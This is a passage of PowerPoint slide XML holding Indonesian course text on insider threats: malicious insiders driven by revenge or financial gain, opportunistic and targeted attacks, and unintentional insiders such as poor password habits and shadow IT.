              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontraktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Motivator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>balas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dendam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuntungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>finansial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>oportunis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditargetkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merencanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaksanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kampanye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melancarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seorang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menebak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gaji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>oportunistik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Anda juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesadaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecerobohan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disengaja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shadow IT, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
